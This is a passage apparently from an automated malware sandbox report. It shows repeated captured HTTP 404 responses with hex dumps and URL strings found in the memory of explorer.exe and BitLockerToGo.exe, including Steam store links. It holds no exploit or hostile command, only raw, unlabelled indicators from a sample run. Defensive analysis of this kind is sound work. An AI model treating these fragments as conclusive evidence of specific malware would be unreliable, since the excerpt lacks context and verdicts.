6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ef d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW\|
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 76 12 7e 54 e0 37 00 fd ff 4f bd 9f f1 a3 23 db 20 c2 b6 26 42 10 Data Ascii: #\v~T7O# &B
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 e8 d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW\|
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:28:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:30:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:30:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:30:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:30:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:30:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:30:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:30:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:30:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:30:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:31:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 19 Aug 2024 07:31:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000001.00000000.1854160723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1855756939.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1854160723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1855756939.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1854160723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1855756939.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1854160723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1855756939.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1854160723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1854160723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000001.00000000.1854160723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000001.00000000.1856548209.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1855305019.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1854877371.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3027160637.000000000332F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: explorer.exe, 00000001.00000000.1857879944.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1854160723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1854160723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1857879944.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1855756939.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1855756939.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1852670256.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1853265897.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1855756939.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1855756939.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1855756939.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
